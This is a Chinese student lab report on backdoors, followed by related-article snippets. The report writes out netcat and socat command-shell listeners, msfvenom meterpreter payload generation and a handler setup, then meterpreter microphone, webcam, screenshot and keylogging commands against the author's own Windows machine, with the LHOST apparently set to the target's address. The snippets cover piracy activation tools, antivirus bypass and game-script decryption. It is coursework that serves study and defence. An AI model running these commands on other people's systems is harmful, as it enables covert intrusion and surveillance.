Exp2 后门原理与实践

article/2025/10/3 14:02:10

20155332《网络对抗》Exp2 后门原理与实践

1.实验环境

  • 主机一台联想台式机,安装有win10系统 。
  • 安装的kali虚拟机为攻击机。
  • 我的win10系统作为靶机。(建议再安装一个虚拟机作为靶机,不要像我这么做。我电脑有点卡,就没有安装那么多虚拟机了)
  • win10系统里,需要安装好ncat工具和socat工具,下载地址见老师的码云。
  • win10的IP是172.16.2.29,kali虚拟机的IP是192.168.114.129.

    2.实验内容 (3.5分)

  • (1)使用netcat获取主机操作Shell,cron启动 (0.5分)
  • (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)
  • (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
  • (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
  • (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

3.实验步骤

3.1使用netcat获取主机操作Shell,cron启动

1.在win10的cmd里,进入D:\ncat\ncat,输入ncat -l -e cmd.exe -p 53
wjoiRe3.png

2.在kali的终端里,输入nc 172.16.2.29 53连接win10,获得shell权限

6E6oPMF.png

3.2使用socat获取主机操作Shell, 任务计划启动

1.在win10靶机中点击控制面板->系统和安全->管理工具->任务计划程序,话不多说,上图。

1Ri5p2b.png

WnCAoxF.png

dLVoPXl.png

在操作选项卡中绑定socat程序,给出参数 tcp-listen:5332exec:cmd.exe,pty,stderr

GR4gpMj.png

右键5332进程,然后启动就行。
fs87baG.png

2.在kali虚拟机中,socat - tcp:172.16.2.29:5332
,就可以获得win10的shell权限了

3.3使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在kali虚拟机中用Meterpreter生成后门。
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.29 LPORT=5332 -f exe > backdoor.exe

2.把这个后门用ncat传送到靶机上。
kali:ncat -l 5332 < backdoor.exe
nc 172.16.2.29 > backdoor.exe

3.开启后门

  • 在kali虚拟机终端输入 msfconsole

iUPA8zj.png

  • 接着输入 use exploit/multi/handler
  • 输入set payload windows/meterpreter/reverse_tcp

f2ODBwF.png

  • set LHOST 172.16.2.29
  • set LPORT 5332
  • show options
  • exploit

E1otlEX.png

4.开始窃取个人隐私

  • 输入shell,获得windows 命令行

wM3JByP.png

3.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 输入record_mic获取音频

  • webcam_snap打开摄像头

  • screenshot截屏

fsaQOSK.jpg

  • keyscan_start开始键盘记录
  • keyscan_dump导出键盘记录
    FSyN9nh.png

5.尝试提权
输入getsystem提权,但是失败了。

4.基础问题回答

  • (1)例举你能想到的一个后门进入到你系统中的可能方式?

    答:太多了。作为《机要风云》的演员之一,我饰演的机要员小刘的电脑就被黑客植入过后门。

    捆绑软件可以把后门和应用软件捆绑在一起,让我下载,进入我的系统。

    浏览网页的时候,一些弹窗会自动下载恶意软件。

    用一些破解软件,比如我的office就是用小马KMS激活的,可能就在电脑留下了后门。

    有人趁我不注意用U盘拷到我的电脑里。

  • (2)例举你知道的后门如何启动起来(win及linux)的方式?

    伪装成正规软件,双击就可以启动。

    或者设置为开机自启动。

  • (3)Meterpreter有哪些给你映像深刻的功能?
  • 可以打开电脑的摄像头,可以直播。去年参加微视演绎的时候,学姐给我电脑里植入的后门,打开了我的摄像头,我感到震惊。毕竟自己笔记本电脑的摄像头从来没用过,然后就被别人控制了,太可怕了。现在我终于知道了这个其实并不难。
  • (4)如何发现自己有系统有没有被安装后门?

    用windows defender对电脑进行实时防护。

    做实验的时候我只有把他关了才能运行这个后门程序。一打开Windows defender就会提醒电脑有恶意病毒,然后就把它删了。

    所以,自带的杀毒软件还是不错的。

转载于:https://www.cnblogs.com/besti2015/p/8664303.html


http://chatgpt.dhexx.cn/article/0gBOTbph.shtml

相关文章

Win10正式版激活方法有哪些?如何激活Win10?

很多用户都想将系统升级到Win10,但是却不知道怎么激活Win10正式版的方法,其实不同版本激活正式版Win10的方法秘钥不同,下面99安卓网小编就分享一些激活Win10正式版的方法和秘钥,供大家参考。 目前win10正式版已经发布,相信已经有非常多的Win7/Win8.1用户升级安装了Win10正…

win10一键激活,解除SymantecEndpointProtection的自动拦截

破解背景&#xff1a; win10系统&#xff0c;电脑预装有SymantecEndpointProtection安全软件&#xff0c;每次采用小马KMS等激活工具激活系统的时候回自动拦截掉&#xff0c;贼烦。 破解原理&#xff1a; 相关原理可查看来自蓝点网的转载连接&#xff1a;https://mp.weixin.…

Windows常用软件推荐

前言 很多人都认为我是计算机高手,其实我只会帮你修理下你的电脑啦,曾几何时我也帮助过好多好多的同学和老师,尝试和体验各种各样的软件,但谁又能想到我曾今也对你们的电脑做过很多失败的坑爹操作,把你们最宝贵的数据撸得灰飞烟灭,这里要感谢当时允许我不断尝试失败的大…

第二十三期:你用的Windows操作系统是不是盗版?微软知道吗

长期以来,一些小白对于微软操作系统的“正版”“盗版”“原版”的含义不太明确,从根本上说Windows原始版权属于微软,我们没有那个技术去开发盗版操作系统,很多人用的可能是二次修改的版本,而操作系统的激活方式,决定其成为正版或者盗版。 长期以来,一些小白对于微软操作…

俺可爱的小马,差点被淹了

时间&#xff1a;2008年8月6日&#xff0c;下午 地点&#xff1a;北京中关村软件园 一场突然急速的暴雨&#xff0c;在短短十几分钟的时间内&#xff0c;就起水二十多厘米深&#xff0c;眼看水快漫过我的“白色小马&#xff08;千里马&#xff09;”的排气管&#xff0c;只好冒…

WIN10 解决“无法完成操作,因为文件包含病毒或潜在的垃圾软件”

新装了win 10 系统&#xff0c;一路遇到了一堆的问题&#xff0c;有空详述 今天在激活的时候 &#xff0c;本来想找个产品密钥激活&#xff0c;但是找了很多个都不能成功&#xff0c;最终选择下载激活工具 第一次下载了KMSpico小马激活工具&#xff0c;解压安装系统提示 傻夫…

快速搭建一个简易的KMS 服务

xu言&#xff1a; 之前&#xff0c;闹的沸沸扬扬的KMS激活工具自身都存在问题的事。让我们对以前的什么小马激活、kms激活、各种激活工具都去打了一个深深的“&#xff1f;”&#xff0c;到底哪些能用。哪些不能用。有些还注明的里面必须要关闭杀毒软件&#xff0c;以免误杀。。…

.Net jsc.exe 编译js 成exe

转载于:https://www.cnblogs.com/cjm123/p/10315736.html

QT【QWidget和QML混合使用】

Qt Widgets、QML、Qt Quick的区别简述 看了之前关于 QML 的一些介绍&#xff0c;很多人难免会有一些疑惑&#xff1a; Q1&#xff1a;QML 和 Qt Quick 之间有什么区别&#xff1f; Q2&#xff1a;QtQuick 1.x 和 QtQuick 2.x 之间有什么区别&#xff1f; Q3&#xff1a;为什么要…

ubuntu20.04编译安装qt5.14.2和qtcreator4.12.0

编译qt5.14.2 本来编译安装的是qt5.15.2&#xff0c;编译安装ok&#xff0c;一切就绪&#xff0c;安装qtcreator安装后一直报错&#xff0c;“以下插件有错误&#xff0c;无法载入&#xff1a;QmlDesigner QmlProfiler &#xff0c;插件初始化失败&#xff1a;cannot Create…

cocos2d-js 手游解密jsc和http数据aes加密解密分析①

分析流程 1.查看游戏引擎类型 2.安装游戏 3.抓包分析 4.ida分析so文件 5.获取密钥解密 6.分析解密后源码 7.验证分析结果 解密工具:jsc解密1.44.zip-其它文档类资源-CSDN下载cocos-jsc解密加密程序,需知道key,这些可以通过ida或Frida获取,支持最新更多下载资源、学习…

js 加密 为jsc

从Cocos2D-X v2.1.4版本开始&#xff0c;增加了Cocos2D-console命令行工具&#xff0c;该工具的其中一个功能是&#xff1a;把.js文件转换为.jsc文件&#xff0c;该文件是字节码格式&#xff0c;可以提高代码的安全性。 使用这个工具的方式很简单。以引擎自带的TestJavaScript项…

android cocoscreator jsc js 间加解密(六)

前言 前面 学了 aandroid cocoscreator 热更新 超详细篇&#xff08;五&#xff09; 这章 主要学习 cocoscreator 构建后 jsc 与js 文件 之间相互转化&#xff08;加解密&#xff09;并实际测试. 可以配置cocoscreator热更新使用 1: 准备 win7 64位 cocoscreator2.0.10 &#…

jsc反编译以及二进制修改

参考&#xff1a;https://www.52pojie.cn/thread-814217-1-1.html 最近碰到jsc的游戏&#xff0c;游戏中有跳过功能但有限制&#xff0c;想着对游戏进行修改达到无条件跳过。 首先&#xff0c;反编译jsc文件&#xff0c;使用这个工具https://github.com/irelance/jsc-decompile…

jsc反编译工具编写探索之路

对于经常做游戏安全逆向的读者来说&#xff0c;可能会经常遇到Cocos2dx编写的游戏。这个国产开源的游戏开发引擎支持多种编程语言进行游戏开发&#xff1a;发括主流的C/C/JavaScript/Lua&#xff0c;之前&#xff0c;与大家讨论的Lua软件安全系列的文章&#xff0c;讨论的是采用…

vue.jsc初体验

Vue 1.安装脚手架 (1)npm install -g vue-cli (2)Vue -v //查看是否安装成功 (3)Vue init webpack name(名称) (4)Npm install (5) (6)Npm install (7)Npm run dev 2.用vue构建项目笔记3(引入jquery和bootstrap) 其实用了vue以后&#xff0c;并不建议再去用jquery. vue是视图…

jsc转js工具使用方法

近日难得手闲写了这个小工具&#xff0c;发上来让大家参考参考。之前没有写详细使用说明&#xff0c;这里补一下 进到工具的文件夹下&#xff0c;直接执行exe可以看到要什么参数 这个新弹出的窗口可以直接关闭&#xff0c;这个只是让你看它需要什么参数的 2.所以如果你要解密…

Day07Spark多语言开发

Spark多语言开发 学习目标 1.掌握使用Java语言开发Spark程序 2.了解线性回归算法案例 3.了解使用Python语言开发Spark程序 4.了解决策树分类算法案例 1. JavaSpark 1.1 编程语言说明 Spark 在诞生之初就提供了多种编程语言接口&#xff1a;Scala、Java、Python 和 SQL&#x…

cocos creator jsc 逆向解码为js

cocos creator 下的jsc cocos creator 编译之后的所生成的jsc文件&#xff0c;虽然后缀是jsc,但其实和js虚拟机所执行的字节码(jsc)是二个不同的东西&#xff0c;只是使用xxtea对js文件进行加密而已。xxtea是可逆的&#xff0c;所以cocos creator下的jsc是完全可逆的&#xff…

Cocos2dx-js 资源.jsc和.pkm反编译

.jsc 解密 1. 找到apk里面的libcocos2djs.so. 用编辑器utf-b模式打开 2. 搜索Cocos Game 紧接着的 220404db-d3df-4b 就是密码 3. 使用工具decrypt.exe 即可解密 下载地址:https://download.csdn.net/download/liutietuo/86511410 cocos creator script decrypt version 1.0…